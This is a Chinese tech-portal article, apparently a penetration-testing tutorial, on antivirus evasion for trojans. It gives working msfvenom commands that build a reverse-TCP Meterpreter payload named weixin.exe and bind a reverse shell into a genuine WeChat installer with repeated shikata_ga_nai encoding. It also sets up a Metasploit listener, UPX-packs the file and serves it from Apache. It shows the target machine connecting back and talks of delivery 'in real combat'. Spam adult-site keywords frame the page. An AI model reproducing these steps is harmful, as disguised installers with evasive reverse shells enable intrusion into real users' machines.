在线观看www成人影院-在线观看www日本免费网站-在线观看www视频-在线观看操-欧美18在线-欧美1级

0
  • 聊天消息
  • 系統消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發帖/加入社區
會員中心
創作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內不再提示

木馬免殺的幾種方式

馬哥Linux運維 ? 來源:馬哥Linux運維 ? 作者:馬哥Linux運維 ? 2022-07-08 10:47 ? 次閱讀

免殺,又叫免殺毒技術,是反病毒,反間諜的對立面,是一種能使病毒或木馬免于被殺毒軟件查殺的軟件。它除了使病毒木馬免于被查殺外,還可以擴增病毒木馬的功能,改變病毒木馬的行為。免殺的基本特征是破壞特征,有可能是行為特征,只要破壞了病毒與木馬所固有的特征,并保證其原有功能沒有改變,一次免殺就能完成了。免殺技術也并不是十惡不赦的,例如,在軟件保護所用的加密產品(比如殼)中,有一些會被殺毒軟件認為是木馬病毒;一些安全領域中的部分安全檢測產品,也會被殺毒軟件誤殺,這時就需要免殺技術來應對這些不穩定因素。

1、裸奔馬的嘗試

意為不做任何免殺處理的木馬

1、使用msf的msfvenom生成木馬文件,生成一個裸奔馬,命名為 weixin.exe吧

命令:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=8888 -f exe > weixin.exe

abf372ee-fdf9-11ec-ba43-dac502259ad0.jpg

2、部署一下kali上的apache服務,令目標機器能夠訪問下載我們生成的木馬

2.1、kali中是自帶有apache的,啟動apache服務

ac0b1098-fdf9-11ec-ba43-dac502259ad0.jpg

2.2、把生成的weixin.exe文件放在/var/www/html文件夾下

ac23dd8a-fdf9-11ec-ba43-dac502259ad0.jpg

2.3、在靶機下訪問192.168.111.132/weinxin.exe,已經下載

ac3774c6-fdf9-11ec-ba43-dac502259ad0.jpg

2.4、發現被AV查殺

ac4d0750-fdf9-11ec-ba43-dac502259ad0.jpg

ac5d624e-fdf9-11ec-ba43-dac502259ad0.jpg

如果在實戰中,直接投遞裸奔馬比較容易引起對方運維人員的警覺,這種方式也比較冒險,所以在投遞之前,要測試制作的木馬是否會引起相關AV的查殺,比如在在線多引擎病毒識別工具中去測試

2.5、這里po一個在線殺毒查殺的網站,virustotal是一個提供免費的可疑文件分析服務的網站,它與傳統殺毒軟件的不同之處是它通過多種反病毒引擎掃描文件。使用多種反病毒引擎對您所上傳的文件進行檢測, 以判斷文件是否被病毒, 蠕蟲, 木馬, 以及各類惡意軟件感染。

ac70f1a6-fdf9-11ec-ba43-dac502259ad0.jpg

2、MSF編碼

在metasploit框架下免殺的方式之一是msf編碼器,功能是使用msf編碼器對我們制作的木馬進行重新編碼,生成一個二進制文件,這個文件運行后,msf編碼器會將原始程序解碼到內存中并執行。

1、在kali終端輸入 msfvenom -l encoders,這可以列出所有可用的編碼格式

ac8cc3e0-fdf9-11ec-ba43-dac502259ad0.jpg

2、在msf的/data/templates/下有很多metasploit自帶的用于捆綁木馬的程序模板,這個模塊但是一些反病毒廠商關注的重點,為了更好的實現免殺,我們需要自主選擇一個待捆綁程序。在這里選擇是真正的微信安裝包。(也有對裸奔馬進行shikata_ga_nai編碼饒AV的方法,但是shikata_ga_nai編碼技術多態,每次生成的攻擊載荷文件都不一樣,有時生成的文件會被查殺,有時不會,所以結合以上思路,生成一個捆綁木馬,并進行shikata_ga_nai編碼)

aca4ddc2-fdf9-11ec-ba43-dac502259ad0.jpg

把微信安裝包放在/root文件夾下

acbae414-fdf9-11ec-ba43-dac502259ad0.jpg

3、使用msfvenom生成一個Windows環境下的木馬,并捆綁到WeChatSetup.exe上生成WeChatSetup1.exe的合成馬,同時對木馬進行x86/shikata_ga_nai進行多次編碼的方式進行免殺處理。

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.111.132 LPORT=9999 -e x86/shikata_ga_nai -x WeChatSetup.exe -i 12 -f exe -o /root/WeChatSetup1.exe

acd4c0dc-fdf9-11ec-ba43-dac502259ad0.jpg

參數說明:

-e /指定編碼方式對攻擊載荷進行重新編碼

-x /指定木馬捆綁在哪個可執行程序模板上

-i /指定對目標進行編碼的次數,多次編碼理論上有助于免殺的實現

-f /指定msf編碼器輸出程序的格式

-0 /指定處理完畢后的文件輸出路徑

4、把生成的文件放在kali中的apache服務對應的文件夾下,令攻擊機訪問

aceb1e7c-fdf9-11ec-ba43-dac502259ad0.jpg

5、攻擊機下載后,在msf上創建監聽

use exploit/multi/handler

set payload windows/shell/reverse_tcp ///選擇payload為Windows/shell/reverse_tcp

show options ///查看一下哪些選項需要配置

set lhost 192.168.111.132 ///設置一下主機地址

set lport 9999 ///設置下主機端口,為木馬設定的端口

run

ad0360e0-fdf9-11ec-ba43-dac502259ad0.jpg

6、在目標機器上點擊偽造的安裝包,沒有打開,因為捆綁木馬并多次編碼后,安裝包源文件已經損壞,但是在攻擊機的,目標機器已經上線

ad16150a-fdf9-11ec-ba43-dac502259ad0.jpg

3、UPX加殼

upx打包器有兩種功能,一種叫做給程序加殼,一種叫壓縮程序,在這里使用打包器的目的是改變后門程序的特征碼。

壓縮的時候:它首先可執行文件中的可執行數據解壓出來,然后將解壓縮用的代碼附加在前面

運行的時候:將原本的可執行數據解壓出來,然后再運行解壓縮后的數據

1、在kali中內置了upx打包器,輸入upx可以看下參數介紹

ad3097ea-fdf9-11ec-ba43-dac502259ad0.jpg

2、簡單的命令就是直接upx file,對file文件進行加殼處理,加殼后,因為經過壓縮,文件大小會變小

ad5161e6-fdf9-11ec-ba43-dac502259ad0.jpg

3、還是老樣子,把上面經歷過編碼后,又加殼的weixin安裝包放在apache服務的文件夾下,供目標機器讀取下載(如上2.4)

ad6f17cc-fdf9-11ec-ba43-dac502259ad0.jpg

4、在msf上可以創建正常的連接和監聽,成功傳回

ad9fade2-fdf9-11ec-ba43-dac502259ad0.jpg

后言

免殺技術也被安全技術廠商盯上并開發相對應的檢測技術,所以免殺技術與殺軟技術是互相促進發展的,而且發展速度很快,有些現在可以測試成功的殺軟技術,過段時間就不能用了。免殺技術還需要狠下功夫去研究,接下來也會嘗試python,GO寫的免殺,也會在后續文章中敘述進展!

審核編輯 :李倩

聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。 舉報投訴
  • 編碼器
    +關注

    關注

    45

    文章

    3645

    瀏覽量

    134624
  • 木馬
    +關注

    關注

    0

    文章

    47

    瀏覽量

    13345
  • 模板
    +關注

    關注

    0

    文章

    108

    瀏覽量

    20572

原文標題:滲透測試-木馬免殺的幾種方式

文章出處:【微信號:magedu-Linux,微信公眾號:馬哥Linux運維】歡迎添加關注!文章轉載請注明出處。

收藏 人收藏

    評論

    相關推薦

    SF6密度傳感器焊接螺絲壓緊5芯航空插頭

    ?SF6密度傳感器焊接螺絲壓緊5芯航空插頭是一種應用于SF6氣體監測設備的連接部件,它采用焊接、螺絲壓緊的技術,具有5芯的設計?。 5芯航空插頭?焊接設計?:傳統的航空插頭往往采用焊接
    的頭像 發表于 12-31 11:43 ?62次閱讀
    SF6密度傳感器<b class='flag-5'>免</b>焊接螺絲壓緊5芯航空插頭

    光伏調節器接線方式幾種

    光伏調節器(通常也被稱為光伏控制器)的接線方式主要涉及到與光伏板、電池組、負載以及其他可能設備的連接。雖然具體的接線方式可能因不同的光伏控制器型號和系統設計而有所差異,但一般來說,光伏控制器的接線方式可以歸納為以下
    的頭像 發表于 10-01 15:58 ?422次閱讀

    工業機器人控制方式幾種

    工業機器人的控制方式多種多樣,這些方式根據作業任務的不同而有所區別。主要可以分為以下幾種:點位控制方式、連續軌跡控制方式、力(力矩)控制
    的頭像 發表于 09-04 09:31 ?973次閱讀

    bnc母頭法蘭的安裝幾種方式

      德索工程師說道BNC母頭法蘭的安裝方式通常根據具體的應用場景和需求有所不同,但一般可以分為以下幾種常見方式:   這種安裝方式簡單快捷,不需要復雜的焊接工藝。   通過
    的頭像 發表于 08-17 09:26 ?431次閱讀
    bnc母頭法蘭的安裝<b class='flag-5'>幾種</b><b class='flag-5'>方式</b>

    LED恒流驅動芯片常用的幾種主流調光方式

    LED恒流驅動芯片常用的幾種主流調光方式包括:PWM調光、模擬電壓調光和數字總線調光,開關調光。? 下面是它們的比較:? 1.PWM調光: PWM(Pulse Width Modulation)調光
    的頭像 發表于 08-12 10:17 ?2138次閱讀
    LED恒流驅動芯片常用的<b class='flag-5'>幾種</b>主流調光<b class='flag-5'>方式</b>

    并聯電容器的補償方式有哪幾種

    并聯電容器是一種廣泛應用于電力系統和電子設備中的無功功率補償設備。它通過向系統提供無功功率,改善系統的功率因數,提高系統的穩定性和效率。并聯電容器的補償方式有很多種,下面將介紹幾種常見的補償方式
    的頭像 發表于 07-12 14:50 ?808次閱讀

    控制閥有哪幾種控制方式

    控制閥是工業自動化系統中的重要組成部分,其主要作用是控制流體的流量、壓力、溫度等參數,以滿足生產過程的需要。控制閥的控制方式有很多種,不同的控制方式適用于不同的應用場景。本文將詳細介紹控制閥的幾種
    的頭像 發表于 06-30 09:51 ?871次閱讀

    連接器的連接方式幾種

    按照其連接方式可以分為以下幾種: 插頭式連接器:插頭式連接器是一種常見的連接方式,其特點是插頭和插座之間通過機械力實現連接。插頭式連接器廣泛應用于電子設備、通信設備、汽車等領域。 插座式連接器:插座式連接器與插
    的頭像 發表于 06-20 09:21 ?1451次閱讀

    發電機起勵方式幾種類型

    方式和他勵方式。 自勵方式 自勵方式是指發電機在啟動過程中,通過自身的磁場來建立電壓的方式。自勵方式
    的頭像 發表于 06-13 14:57 ?3219次閱讀

    串口屏的幾種安裝方式

    串口屏的幾種安裝方式
    的頭像 發表于 05-10 11:28 ?1568次閱讀

    java實現多線程的幾種方式

    Java實現多線程的幾種方式 多線程是指程序中包含了兩個或以上的線程,每個線程都可以并行執行不同的任務或操作。Java中的多線程可以提高程序的效率和性能,使得程序可以同時處理多個任務。 Java提供
    的頭像 發表于 03-14 16:55 ?718次閱讀

    換流方式有哪幾種,各有什么特點

    換流方式是指將流體從一個環境轉移到另一個環境的過程。根據不同的應用場景和特點,有多種不同的換流方式。下面將介紹常見的幾種換流方式及其特點。 自然對流換流 自然對流換流是指通過流體自身的
    的頭像 發表于 03-11 15:24 ?4604次閱讀

    變壓器的調壓方式有哪幾種?

    常見的大功率級別的調壓方式有哪些? 變壓器調壓又分為哪幾種形式? 調壓入合調壓出合調壓入分調壓出分這幾個概念分別是什么意思?
    發表于 02-21 15:11

    熱電阻的引出線方式幾種?都有什么影響?

    熱電阻的引出線方式幾種?都有什么影響? 熱電阻是一種常用的溫度測量元件,通過測量材料電阻隨溫度變化的特性來實現溫度的檢測。而熱電阻的引出線方式在應用中是非常重要的,可以影響到測量的準確性和穩定性
    的頭像 發表于 02-05 11:14 ?1818次閱讀

    當出現軸磨損的時有幾種修復方式

    電子發燒友網站提供《當出現軸磨損的時有幾種修復方式.docx》資料免費下載
    發表于 01-18 15:43 ?0次下載
    主站蜘蛛池模板: 国产网站免费视频| 一级片 在线播放| 九九精品影院| 很狠操| 色色视频免费网| 俄罗斯aaaaa一级毛片| 1024手机看片国产| 天天操天天干天天摸| 国产一级久久免费特黄| 黄色美女网站免费| 国产papa| 久久精品亚洲一级毛片| 色视频网址| 欧美日剧在线免费| 三级在线观看免播放网站| 亚洲淫视频| 四虎在线观看一区二区| 亚洲色图在线视频| 男男浪荡性受高hnp肉| 黄色高清视频网站| 亚洲男人天堂2020| 夜色伊人| 日本黄色片段| 国产亚洲综合色就色| 亚洲综合丁香| 4hc44四虎www亚洲| 国产美女一级ba大片免色| 久久综合免费视频| 国产人免费人成免费视频| 一级特黄aaa大片| 国产亚洲高清视频| 国产伦精品一区二区| 免费久久久久| 殴美一级| 日本加勒比在线精品视频| 婷婷综合网站| 成人牲交一极毛片| 求av网站| 最近2018中文字幕免费看手机| 四虎影院最新地址| 黄色大毛片|